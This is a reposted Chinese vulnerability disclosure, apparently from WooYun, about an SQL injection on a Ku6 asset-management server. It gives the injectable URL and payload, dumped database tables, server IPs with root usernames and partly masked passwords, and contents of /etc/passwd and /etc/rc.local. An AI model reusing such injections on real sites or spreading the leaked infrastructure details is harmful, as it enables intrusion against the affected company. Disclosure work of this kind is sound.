记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

酷6网某核心服务器存在SQL注射漏洞(root权限可读写文件)

2015-01-01 03:05

code 区域
http://fixedassets.ku6.cn/req_sub_business_list.php?business_id=1'

Query failed:You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' order by sub_business_id' at line 1



code 区域
Database: itil

[91 tables]

+-------------------------------+

| CDN_storage_config |

| cdn_fixed_collection |

| fixed_cdn_count_by_excel |

| m5_server |

| maintenance_info |

| malfunction_report |

| monitor_item_report |

| monitor_report |

| portscan |

| portscanext |

| report_center |

| tb_business |

| tb_cdn_config |

| tb_cdn_push_speed |

| tb_cdn_storage |

| tb_cdn_storage_back |

| tb_cdnid_usage |

| tb_cdnid_usage_0101 |

| tb_cdnid_usage_history |

| tb_change_history |

| tb_company |

| tb_contract |

| tb_contract_ext |

| tb_delnode_flow |

| tb_delnode_flow_step |

| tb_delnode_step_user |

| tb_department |

| tb_district |

| tb_fixed_appliances |

| tb_fixed_applicant |

| tb_fixed_cabinet |

| tb_fixed_chair |

| tb_fixed_change_log |

| tb_fixed_data |

| tb_fixed_disk |

| tb_fixed_fax |

| tb_fixed_firewall |

| tb_fixed_furniture |

| tb_fixed_info |

| tb_fixed_it_other_equipment |

| tb_fixed_log |

| tb_fixed_mobile |

| tb_fixed_monitor |

| tb_fixed_new_studio_equipment |

| tb_fixed_note |

| tb_fixed_other |

| tb_fixed_pc |

| tb_fixed_printer |

| tb_fixed_projector |

| tb_fixed_recording |

| tb_fixed_server |

| tb_fixed_storage |

| tb_fixed_supplier |

| tb_fixed_switch |

| tb_fixed_table |

| tb_idc |

| tb_isp |

| tb_link |

| tb_link_20090326 |

| tb_log |

| tb_newnode_flow |

| tb_newnode_flow_step |

| tb_newnode_router |

| tb_newnode_server |

| tb_newnode_step_user |

| tb_os_type |

| tb_person |

| tb_privilege |

| tb_process |

| tb_province |

| tb_router |

| tb_s_base |

| tb_s_base_0401 |

| tb_s_hardware |

| tb_s_password |

| tb_s_port |

| tb_s_process |

| tb_s_software |

| tb_second_party |

| tb_server_log |

| tb_sub_business |

| tb_team |

| tb_tmp |

| tb_user |

| tb_user_tpl |

| view_cdn_server_link |

| view_cdn_storage |

| view_contract |

| view_idc |

| view_link_disc |

| view_server |

+-------------------------------+



code 区域
[06:34:32] [INFO] analyzing table dump for possible password hashes

Database: itil

Table: tb_newnode_server

[65 entries]

+-------+---------+-----------------+------+---------+---------+--------------+----------+

| id | ip2 | ip1 | user | port2 | port1 | passwd | server_u |

+-------+---------+-----------------+------+---------+---------+--------------+----------+

| 10000 | <blank> | 120.193.9.34 | root | <blank> | G0/5 | ku*******.com | 1U |

| 10000 | <blank> | 120.193.9.35 | root | <blank> | G0/6 | ku*******.com | 1U |

| 10000 | <blank> | 120.193.9.36 | root | <blank> | G0/7 | ku*******.com | 1U |

| 10000 | <blank> | 120.193.9.37 | root | <blank> | G0/8 | ku*******.com | 1U |

| 10000 | <blank> | 120.193.9.38 | root | <blank> | G0/9 | ku*******.com | 2U |

| 10000 | <blank> | 120.193.9.39 | root | <blank> | G0/1 | ku*******.com | 2U |

| 10000 | <blank> | 120.193.9.40 | root | <blank> | G0/2 | ku*******.com | 2U |

| 10000 | <blank> | 120.193.9.41 | root | <blank> | G0/3 | ku*******.com | 2U |

| 10000 | <blank> | 120.193.9.42 | root | <blank> | G0/4 | ku*******.com | 2U

漏洞证明:

readfile: /etc/passwd

code 区域
root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin

rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin

abrt:x:173:173::/etc/abrt:/sbin/nologin

haldaemon:x:68:68:HAL daemon:/:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

postfix:x:89:89::/var/spool/postfix:/sbin/nologin

rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin

nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin

sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin

rd:x:500:500::/home/rd:/bin/bash

op:x:501:501::/home/op:/bin/bash

cdnscan:x:0:0::/home/cdnscan:/bin/bash

mysql:x:502:503::/home/mysql:/sbin/nologin

www:x:503:504::/home/www:/sbin/nologin





readfile: /etc/rc.local

code 区域
#!/bin/sh

#

# This script will be executed *after* all the other init scripts.

# You can put your own initialization stuff in here if you don't

# want to do the full Sys V style init stuff.

route add -net 10.11.0.0/16 gw 10.11.45.1

touch /var/lock/subsys/local

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-088881

阅读:103022 | 评论:0 | 标签:漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“酷6网某核心服务器存在SQL注射漏洞(root权限可读写文件)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词